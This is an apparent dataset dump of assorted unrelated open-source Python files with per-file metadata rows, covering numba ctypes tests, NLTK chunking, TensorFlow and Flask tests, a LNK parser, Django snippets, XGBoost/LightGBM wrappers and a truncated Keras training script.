# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return CursorWampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
| 38.205224
| 133
| 0.614611
| 8,278
| 0.808477
| 3,003
| 0.29329
| 3,652
| 0.356675
| 0
| 0
| 1,386
| 0.135365
|
af58316a61820a09a31e0f30a7a6aca3f04dde99
| 861
|
py
|
Python
|
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | 1
|
2022-02-21T07:05:48.000Z
|
2022-02-21T07:05:48.000Z
|
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | null | null | null |
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | null | null | null |
codewords={
'array':'an arrangement of aerials spaced to give desired directional characteristics',
'byte':'computer memory unit',
'boolean':'a data type with only two possible values: true or false',
'debug':'locate and correct errors in a computer program code',
'address':'the code that identifies where a piece of information is stored'
}
# add five words
codewords['append']='a procedure for concatenating (linked) lists or arrays in some high-level programming languages'
codewords['adapter']='device that enables something to be used in a way different from that for which it was intended or makes different pieces of apparatus compatible'
codewords['constant']='a non-varying value'
codewords['branch']='a division of a stem'
codewords['copy']='reproduce or make an exact copy of'
# print all words
for k,v in codewords.items():
print(k+": "+v)
| 45.315789
| 168
| 0.759582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 716
| 0.831591
|
af5b9601c04d7552ac03872881009c7fc625c108
| 1,832
|
py
|
Python
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division
from ctypes import *
import sys
from numba import unittest_support as unittest
from numba.compiler import compile_isolated
from numba import types
is_windows = sys.platform.startswith('win32')
if not is_windows:
proc = CDLL(None)
c_sin = proc.sin
c_sin.argtypes = [c_double]
c_sin.restype = c_double
def use_c_sin(x):
return c_sin(x)
ctype_wrapping = CFUNCTYPE(c_double, c_double)(use_c_sin)
def use_ctype_wrapping(x):
return ctype_wrapping(x)
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
def use_c_pointer(x):
"""
Running in Python will cause a segfault.
"""
threadstate = savethread()
x += 1
restorethread(threadstate)
return x
@unittest.skipIf(is_windows, "Test not supported on windows")
class TestCTypes(unittest.TestCase):
def test_c_sin(self):
pyfunc = use_c_sin
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_wrapping(self):
pyfunc = use_ctype_wrapping
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_voidptr(self):
pyfunc = use_c_pointer
# pyfunc will segfault if called
cres = compile_isolated(pyfunc, [types.int32])
cfunc = cres.entry_point
x = 123
self.assertTrue(cfunc(x), x + 1)
if __name__ == '__main__':
unittest.main()
| 24.105263
| 64
| 0.662664
| 717
| 0.391376
| 0
| 0
| 779
| 0.425218
| 0
| 0
| 144
| 0.078603
|
af5d86c2560d06e00d095d4daa7efcc3669f67c7
| 377
|
py
|
Python
|
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
from floodsystem.geo import rivers_with_station
from floodsystem.geo import stations_by_river
from floodsystem.station import MonitoringStation
def test_rivers_with_station():
lst2 = rivers_with_station(MonitoringStation)
assert len(lst2) == len(set(lst2))
def test_stations_by_river():
dct1 = stations_by_river(MonitoringStation)
assert type(dct1) == dict
| 26.928571
| 49
| 0.795756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af5fa4a7f4a8959df414d7dee58cac1a11ceef7d
| 875
|
py
|
Python
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | 1
|
2021-05-22T02:46:00.000Z
|
2021-05-22T02:46:00.000Z
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
def chunk_process(corpus):
all_processed = []
for i in corpus:
train_text = i
train_text = train_text.lower()
custom_tokenizer = PunktSentenceTokenizer(train_text)
tokenized = custom_tokenizer.tokenize(train_text)
pro = chunk_process_content(tokenized)
all_processed.append(pro)
return all_processed
def chunk_process_content(tokenized):
processed = []
for i in tokenized:
words = nltk.word_tokenize(i)
# Tags the words as nouns adjectives etc. (FOS)
tagged = nltk.pos_tag(words)
# print(tagged)
# Extract the required words from the corpus
pos = ["NN","NNS","NNP","JJR","JJS","NNPS","JJ"]
for (a,b) in tagged:
if b in pos:
processed.append(a)
# print(processed)
# t = set(processed)
t = []
for i in processed:
if i not in t: t.append(i)
# print(t)
processed = t
return processed
| 23.648649
| 57
| 0.666286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 188
| 0.214857
|
af5fcb0196a0a9c57b0c130032cf305a83d559c5
| 1,036
|
py
|
Python
|
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
"""
This file contains all unit tests that count a number of results in the database. (Corresponding to the file:
'flask_monitoringdashboard/database/count.py')
See info_box.py for how to run the test-cases.
"""
import unittest
from flask_monitoringdashboard.database import session_scope
from flask_monitoringdashboard.database.code_line import get_code_line
FN = 'filename'
LN = 42
FUN = 'fun'
CODE = 'code'
class TestCodeLine(unittest.TestCase):
def test_get_code_line(self):
with session_scope() as db_session:
code_line1 = get_code_line(db_session, FN, LN, FUN, CODE)
code_line2 = get_code_line(db_session, FN, LN, FUN, CODE)
self.assertEqual(code_line1.id, code_line2.id)
self.assertEqual(code_line1.function_name, code_line2.function_name)
self.assertEqual(code_line1.filename, code_line2.filename)
self.assertEqual(code_line1.line_number, code_line2.line_number)
self.assertEqual(code_line1.code, code_line2.code)
| 35.724138
| 113
| 0.726834
| 608
| 0.586873
| 0
| 0
| 0
| 0
| 0
| 0
| 244
| 0.235521
|
af621cd414c91141313b31734d2740e917380a97
| 6,772
|
py
|
Python
|
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for subsettable_context.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_constrained_optimization.python.rates import subsettable_context
def create_contexts():
"""Returns a pair of `SubsettableContext`s to use in tests.
We'll refer to the two contexts as "context1" and "context2". Both are subsets
of the same parent context, which has:
penalty_predicate = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0]
constraint_predicate = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
context1 is subsetted from the parent context using:
penalty_predicate1 = [0, 0, 1, 1, 1, 1, 0, 0, 0, 0]
constraint_predicate1 = [1, 1, 0, 0, 0, 0, 1, 1, 1, 1]
while context2 is subsetted deom the parent context using:
penalty_predicate2 = [0, 0, 0, 0, 1, 1, 1, 1, 0, 0]
constraint_predicate2 = [1, 1, 1, 1, 0, 0, 0, 0, 1, 1]
Returns:
The pair (context1, context2).
"""
predictions = tf.constant(0.0, dtype=tf.float32, shape=(1,))
context = subsettable_context.rate_context(predictions)
penalty_predicate = tf.constant(
[True, False, True, False, True, False, True, False, True, False],
dtype=tf.bool)
constraint_predicate = tf.constant(
[False, True, False, True, False, True, False, True, False, True],
dtype=tf.bool)
context = context.subset(penalty_predicate, constraint_predicate)
penalty_predicate1 = tf.constant(
[False, False, True, True, True, True, False, False, False, False],
dtype=tf.bool)
constraint_predicate1 = tf.constant(
[True, True, False, False, False, False, True, True, True, True],
dtype=tf.bool)
penalty_predicate2 = tf.constant(
[False, False, False, False, True, True, True, True, False, False],
dtype=tf.bool)
constraint_predicate2 = tf.constant(
[True, True, True, True, False, False, False, False, True, True],
dtype=tf.bool)
context1 = context.subset(penalty_predicate1, constraint_predicate1)
context2 = context.subset(penalty_predicate2, constraint_predicate2)
return context1, context2
class SubsettableContextTest(tf.test.TestCase):
"""Tests for `SubsettableContext` class."""
def test_subset_of_subset(self):
"""Tests that taking the subset-of-a-subset works correctly."""
context1, context2 = create_contexts()
context1_penalty_predicate = context1.penalty_predicate.predicate
context1_constraint_predicate = context1.constraint_predicate.predicate
context2_penalty_predicate = context2.penalty_predicate.predicate
context2_constraint_predicate = context2.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that the subset of a subset ANDs the conditions together in
# condition1.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context1_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context1_constraint_predicate))
# Likewise in condition2.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context2_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context2_constraint_predicate))
def test_and(self):
"""Tests `SubsettableContext`'s logical AND operator."""
context1, context2 = create_contexts()
and_context = context1 & context2
and_context_penalty_predicate = and_context.penalty_predicate.predicate
and_context_constraint_predicate = (
and_context.constraint_predicate.predicate)
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that AND applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(and_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(and_context_constraint_predicate))
def test_or(self):
"""Tests `SubsettableContext`'s logical OR operator."""
context1, context2 = create_contexts()
or_context = context1 | context2
or_context_penalty_predicate = or_context.penalty_predicate.predicate
or_context_constraint_predicate = or_context.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that OR applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(or_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(or_context_constraint_predicate))
if __name__ == "__main__":
tf.test.main()
| 42.591195
| 80
| 0.656379
| 3,849
| 0.56837
| 0
| 0
| 0
| 0
| 0
| 0
| 1,894
| 0.279681
|
af623410296e659a3a4c8fe5f812620f14b8f668
| 1,098
|
py
|
Python
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 6
|
2019-04-16T10:19:15.000Z
|
2022-03-18T22:21:18.000Z
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 12
|
2020-09-15T08:02:48.000Z
|
2021-07-19T13:52:57.000Z
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 3
|
2019-10-10T06:38:48.000Z
|
2020-10-25T08:24:34.000Z
|
from LnkParse3.extra.lnk_extra_base import LnkExtraBase
"""
------------------------------------------------------------------
| 0-7b | 8-15b | 16-23b | 24-31b |
------------------------------------------------------------------
| <u_int32> BlockSize >= 0x00000088 |
------------------------------------------------------------------
| <u_int32> BlockSignature == 0xA0000008 |
------------------------------------------------------------------
| <unicode_str> LayerName |
| ? B |
------------------------------------------------------------------
"""
class ShimLayer(LnkExtraBase):
def name(self):
return "SHIM_LAYER_BLOCK"
def layer_name(self):
start = 8
binary = self._raw[start:]
text = self.text_processor.read_string(binary)
return text
def as_dict(self):
tmp = super().as_dict()
tmp["layer_name"] = self.layer_name()
return tmp
| 35.419355
| 66
| 0.327869
| 360
| 0.327869
| 0
| 0
| 0
| 0
| 0
| 0
| 707
| 0.643898
|
af6294e18a82ba001ab631ad5741ea18cea1db0a
| 849
|
py
|
Python
|
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
t = (5,11)
x , y = t
print(x,y)
attendance = {"Rolf": 96, "Bob": 80, "Anne" :100}
print(list(attendance.items()))
for t in attendance.items() :
print(t)
# print(f"{student}: {attended}")
for student, attended in attendance.items() :
print(f"{student}: {attended}")
# Blog post: https://blog.tecladocode.com/destructuring-in-python/
people = [("Bob",42,"Mechanic"), ("James",24,"Artist"), ("Harry",32,"Lecturer")]
for name, age, profession in people:
print(f"Name: {name}, Age: {age}, Profession: {profession}")
for person in people:
print(f"Name: {person[0]}, Age: {person[1]}, Profession: {person[2]}")
person = ("Bob",42,"Mechanic")
name, _, profession = person
print(name, _, profession)
head, two, *tail = [1,2,3,4,5]
print(head)
print(two)
print(tail)
*head, two, tail = [1,2,3,4,5]
print(head)
print(two)
print(tail)
| 22.945946
| 80
| 0.638398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 318
| 0.374558
|
af62d6c68ae4c048711e5debf87644009ac5b327
| 293
|
py
|
Python
|
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
from django.conf.urls.static import static
from django.conf.urls import patterns, url, include
from django.conf import settings
from django.contrib import admin
from apps.app.views import *
admin.autodiscover()
urlpatterns = patterns('',
url(r'^/?$','apps.app.views.index',name='index'),
)
| 26.636364
| 51
| 0.757679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.129693
|
af6346ccaefda878793e2d456fe00155edd718ff
| 483
|
py
|
Python
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | 1
|
2018-07-17T17:09:38.000Z
|
2018-07-17T17:09:38.000Z
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
#list
list=["Apple","Mango","Banana","Pine Apple","Plum"]
for lst in list :
if lst=='Banana':
continue
else:
print(lst)
#tuples
tpls = ("apple", "banana", "cherry","banana",)
print("Tuples:",tpls)
#Set
st = set(("apple", "banana", "cherry"))
st.add("damson")
st.remove("banana")
print("Set:",st)
print("Length",len(st))
#Dictionary
dct = dict(apple="green", banana="yellow", cherry="red")
del(dct["banana"])
print("Dictionary:",dct)
| 20.125
| 57
| 0.583851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.440994
|
af63f358d135bd02b0acb291df904454267fe7f6
| 546
|
py
|
Python
|
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
import sqlite3
import time
import random
conn = sqlite3.connect('pokemon.db')
c = conn.cursor()
id = 0
def dynamic_data_entry():
name = input ("Name: ")
health = input ("Health: ")
stage = input ("Stage:")
ptype = input("Type: ")
retreat = input ("Retreat: ")
year = input ("Year: ")
c.execute("INSERT INTO pm VALUES ( ?,?,?,?,?,?,? )",
(id,name,health,stage,ptype,retreat,year))
conn.commit()
for i in range(600):
dynamic_data_entry()
time.sleep(1)
id += 1
c.close
conn.close()
| 17.0625
| 56
| 0.580586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 106
| 0.194139
|
af6432d71105fd52d5f472fb3ff046ac0d326424
| 2,603
|
py
|
Python
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 3
|
2016-01-27T19:49:23.000Z
|
2020-08-18T13:59:02.000Z
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | null | null | null |
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 1
|
2016-02-01T01:57:54.000Z
|
2016-02-01T01:57:54.000Z
|
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import g
import sqlpie
import math, json
class Matcher(object):
def __init__(self):
pass
@staticmethod
def match_single(source_bucket, document_id, search_bucket, max_matches=1, filter_query=""):
# Read Doc, Get top N top idf terms, and use those in the query.
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches)
return results
@staticmethod
def match_all(source_bucket, search_bucket, max_matches, filter_query, output_predicate=None):
engine = sqlpie.Searcher(filter_query)
num_observations = 0
if output_predicate is None:
output_predicate = "match_" + source_bucket.lower().strip() + "_" + search_bucket.lower().strip()
# Delete observations from specific predicate (match_<bucket>_<search_bucket>)
sqlpie.Observation.remove({"predicate":output_predicate})
sb = sqlpie.Bucket(source_bucket)
sql = ["bucket_id = UNHEX(%s)", sb.bucket_id]
docs = sqlpie.Document.select(sql)
is_encoded_document_id = True
# Loop each document from bucket
for d in docs:
document_id = d[1]
# Get scored best matches for each document
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches, is_encoded_document_id)
observations = []
for r in results:
# Store scored matches/results as observations
num_observations = num_observations + 1
observation = {"subject_bucket":source_bucket, "object_bucket":search_bucket, "subject_id":document_id, \
"predicate":output_predicate, "object_id":r[sqlpie.Document.ID_FIELD], \
"value":r[sqlpie.Document.SCORE_FIELD]}
observations.append(sqlpie.Observation(observation))
if len(observations) > 0:
sqlpie.Observation.add_multiple(observations)
return (num_observations, output_predicate)
@staticmethod
def match_document(document, search_bucket, max_matches, filter_query):
term_ids = sqlpie.Indexer.parse_features(document, False, True)
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(None, None, search_bucket, max_matches, False, term_ids)
return results
| 40.671875
| 124
| 0.659624
| 2,412
| 0.926267
| 0
| 0
| 2,334
| 0.896313
| 0
| 0
| 529
| 0.203149
|
af650e570346dc05a0790bc50a568e6fc7bd4055
| 811
|
py
|
Python
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | 1
|
2019-01-16T14:52:37.000Z
|
2019-01-16T14:52:37.000Z
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | 8
|
2019-10-21T16:18:33.000Z
|
2021-06-08T20:33:14.000Z
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.7 on 2018-07-17 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('smart_contract', '0008_useraccept_company'),
]
operations = [
migrations.CreateModel(
name='Competence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('competence_name', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='comment',
name='competence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='smart_contract.Competence'),
),
]
| 30.037037
| 136
| 0.61529
| 685
| 0.844636
| 0
| 0
| 0
| 0
| 0
| 0
| 173
| 0.213317
|
af664d7b09e7e9a2561541c3ca78ef9e440f0b18
| 5,554
|
py
|
Python
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-12T22:45:32.000Z
|
2021-11-12T22:45:32.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-15T22:14:10.000Z
|
2021-11-16T15:56:14.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | null | null | null |
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
# Standard
import numpy as np
import xgboost as xgb
import lightgbm as lgbm
#------------------------------------------------------------------------------
# XGBoost
#------------------------------------------------------------------------------
class XGBRegressor(xgb.XGBRegressor):
"""
This class copies verbatim the XGBoost regressor as of version 1.5.0
See: https://xgboost.readthedocs.io/en/latest/python/python_api.html#module-xgboost.sklearn
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
n_estimators=200, # Default 100
max_depth=None,
learning_rate=1,
verbosity=0,
objective='reg:squarederror',
booster=None,
tree_method=None,
n_jobs=1,
gamma=None,
min_child_weight=None,
max_delta_step=None,
subsample=0.8,
colsample_bytree=None,
colsample_bylevel=None,
colsample_bynode=0.8,
reg_alpha=None,
reg_lambda=1e-05,
scale_pos_weight=None,
base_score=None,
random_state=1991,
missing=np.nan,
num_parallel_tree=None,
monotone_constraints=None,
interaction_constraints=None,
importance_type='gain',
gpu_id=None,
validate_parameters=None,
enable_categorical=False,
predictor=None
):
super().__init__(
n_estimators=n_estimators,
max_depth=max_depth,
learning_rate=learning_rate,
verbosity=verbosity,
booster=booster,
tree_method=tree_method,
n_jobs=n_jobs,
gamma=gamma,
min_child_weight=min_child_weight,
max_delta_step=max_delta_step,
subsample=subsample,
colsample_bytree=colsample_bytree,
colsample_bylevel=colsample_bylevel,
colsample_bynode=colsample_bynode,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
scale_pos_weight=scale_pos_weight,
base_score=base_score,
random_state=random_state,
missing=missing,
num_parallel_tree=num_parallel_tree,
monotone_constraints=monotone_constraints,
interaction_constraints=interaction_constraints,
importance_type=importance_type,
gpu_id=gpu_id,
validate_parameters=validate_parameters,
enable_categorical=enable_categorical,
predictor=predictor,
)
# # Lazy implementation:
# class XGBRegressor(xgb.XGBRegressor):
# def __init__(self, **kwargs):
# super().__init__(**kwargs)
#------------------------------------------------------------------------------
# LightGBM
#------------------------------------------------------------------------------
class LGBMegressor(lgbm.LGBMRegressor):
"""
This class copies verbatim the LightGBM regressor as of version 3.2.1
See: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRegressor.html#lightgbm-lgbmregressor
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
boosting_type='gbdt',
num_leaves=31,
max_depth=-1,
learning_rate=0.1,
n_estimators=100,
subsample_for_bin=200000,
objective='regression',
class_weight=None,
min_split_gain=0.0,
min_child_weight=0.001,
min_child_samples=20,
subsample=1.0,
subsample_freq=0,
colsample_bytree=1.0,
reg_alpha=0.0,
reg_lambda=0.0,
random_state=None,
n_jobs=1,
silent='warn',
importance_type='split'
):
super().__init__(
boosting_type=boosting_type,
num_leaves=num_leaves,
max_depth=max_depth,
learning_rate=learning_rate,
n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin,
objective=objective,
class_weight=class_weight,
min_split_gain=min_split_gain,
min_child_weight=min_child_weight,
min_child_samples=min_child_samples,
subsample=subsample,
subsample_freq=subsample_freq,
colsample_bytree=colsample_bytree,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
random_state=random_state,
n_jobs=n_jobs,
silent=silent,
importance_type=importance_type
)
| 39.112676
| 111
| 0.46507
| 4,816
| 0.867123
| 0
| 0
| 0
| 0
| 0
| 0
| 1,444
| 0.259993
|
af66914d6ab60784b54d7bda3a416c150d4d2a44
| 5,125
|
py
|
Python
|
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Flatten
import keras.backend as K
import random
import os
import sys
sys.setrecursionlimit(1000000)
def data_load_module(tf):
file = open('int/' + tf + '_1_int_rev.csv')
lines = file.readlines()
file.close()
arr = np.load('npy/' + tf + '.abp.t.npy')
x = []; y = []; tl = []
for line in lines:
sl = line.split(',')
sid = int(sl[0])
#if float(sl[2]) > 60: continue
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def rejection(x, y, tl):
pos_idx = []
neg_idx = []
for i in range(len(y)):
if y[i][0] == 0:
pos_idx.append(i)
else:
neg_idx.append(i)
lp = len(pos_idx)
ln = len(neg_idx)
acc_cnt = lp / ln if lp > ln else ln / lp
tot_idx = []
if lp > ln:
tot_idx = pos_idx
for i in range(int(acc_cnt)):
